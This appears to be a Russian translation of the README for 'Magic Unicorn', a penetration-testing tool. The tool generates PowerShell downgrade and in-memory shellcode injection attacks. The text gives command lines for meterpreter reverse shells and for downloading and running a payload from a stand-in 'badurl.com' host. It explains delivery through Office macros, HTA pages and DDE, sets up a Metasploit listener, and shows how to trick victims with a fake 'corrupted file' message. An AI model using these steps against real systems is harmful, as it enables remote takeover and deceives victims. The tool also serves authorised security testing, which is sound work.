
Unicorn — это простой инструмент для выполнения атаки понижения версии PowerShell и внедрения shellcode напрямую в память. Основан на атаках PowerShell Мэттью Грэбера и технике обхода PowerShell, представленной Дэвидом Кеннеди (TrustedSec) и Джошем Келли на Defcon 18.
Автор: Dave Kennedy (@HackingDave) Веб-сайт: https://www.trustedsec.com
Magic Unicorn — это простой инструмент для использования атаки понижения версии PowerShell и инъекции шелл-кода напрямую в память. Основан на атаках PowerShell Мэттью Грейбера и технике обхода PowerShell, представленной Дэвидом Кеннеди (TrustedSec) и Джошем Келли на Defcon 18.
Использование простое: просто запустите Magic Unicorn (убедитесь, что Metasploit установлен, если используются методы Metasploit, и находится в правильном пути) и Magic Unicorn автоматически сгенерирует команду PowerShell, которую вам останется только скопировать и вставить в окно командной строки или через систему доставки полезной нагрузки. Unicorn поддерживает собственный шелл-код, Cobalt Strike и Metasploit.
root@rel1k:~/Desktop# python unicorn.py
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
-------------------- Magic Unicorn Attack Vector -----------------------------
Вектор атаки с инъекцией PowerShell для x86 на любой платформе Windows.
Автор: Dave Kennedy из TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Благодарности: Matthew Graeber, Justin Elze, Chris Gates
Счастливые магические единороги.
Использование: python unicorn.py полезная_нагрузка reverse_ipaddr порт <необязательно hta или macro, crt>
Пример PS: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Пример Macro: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Пример Macro CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Пример Macro Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
Пример HTA: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
Пример HTA CS: python unicorn.py <cobalt_strike_file.cs> cs hta
Пример HTA Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
Пример DDE: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
Пример CRT: python unicorn.py <path_to_payload/exe_encode> crt
Пример пользовательского PS1: python unicorn.py <путь к ps1 файлу>
Пример пользовательского PS1: python unicorn.py <путь к ps1 файлу> macro 500
Пример Cobalt Strike: python unicorn.py <cobalt_strike_file.cs> cs (экспорт CS в формате C#)
Пример пользовательского шелл-кода: python unicorn.py <path_to_shellcode.txt> shellcode (форматировано 0x00)
Меню помощи: python unicorn.py --help
Всё теперь генерируется в двух файлах: powershell_attack.txt и unicorn.rc. Текстовый файл содержит весь код, необходимый для инъекции атаки PowerShell в память. Обратите внимание, что вам понадобится место, поддерживающее удалённое выполнение команд. Часто это может быть через документ Excel/Word, или через psexec_commands внутри Metasploit, SQLi и т.д. Существует множество возможностей и сценариев использования этой атаки. Просто вставьте команду из powershell_attack.txt в любое окно командной строки или туда, где у вас есть возможность вызвать исполняемый файл PowerShell, и вы получите обратный шелл. Эта атака также поддерживает windows/download_exec в качестве метода полезной нагрузки вместо только полезных нагрузок Meterpreter. При использовании download и exec просто введите python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe, и код PowerShell загрузит и выполнит полезную нагрузку.
Обратите внимание, что вам нужно будет включить слушатель для захвата атаки.
Для атаки через макрос вам нужно зайти в Файл, Свойства, Ленты и выбрать "Разработчик". После этого у вас появится вкладка "Разработчик". Создайте новый макрос, назовите его Auto_Open и вставьте сгенерированный код в него. Это автоматически запустится. Обратите внимание, что пользователю будет показано сообщение о том, что файл повреждён, и документ Excel автоматически закроется. ЭТО НОРМАЛЬНОЕ ПОВЕДЕНИЕ! Это обманывает жертву, заставляя думать, что документ Excel повреждён. После этого вы должны получить шелл через инъекцию PowerShell.
Если вы развёртываете это против Office365/2016+ версий Word, вам нужно изменить первую строку вывода с: Sub Auto_Open()
На: Sub AutoOpen()
Название самого макроса также должно быть "AutoOpen" вместо устаревшего "Auto_Open".
ПРИМЕЧАНИЕ: ПРИ КОПИРОВАНИИ И ВСТАВКЕ В EXCEL, ЕСЛИ ДОБАВЛЯЮТСЯ ДОПОЛНИТЕЛЬНЫЕ ПРОБЕЛЫ, ВАМ НУЖНО УДАЛИТЬ ИХ ПОСЛЕ КАЖДОГО ИЗ РАЗДЕЛОВ КОДА POWERSHELL ПОД ПЕРЕМЕННОЙ "x", ИНАЧЕ ПРОИЗОЙДЁТ СИНТАКСИЧЕСКАЯ ОШИБКА!
Атака HTA автоматически сгенерирует два файла: первый — index.html, который указывает браузеру использовать Launcher.hta, содержащий вредоносный код инъекции PowerShell. Все файлы экспортируются в папку hta_access/, и будет три основных файла. Первый — index.html, второй — Launcher.hta и последний — файл unicorn.rc. Вы можете запустить msfconsole -r unicorn.rc для запуска слушателя для Metasploit.
Пользователь должен нажать "Разрешить" и принять при использовании атаки HTA, чтобы инъекция PowerShell сработала правильно.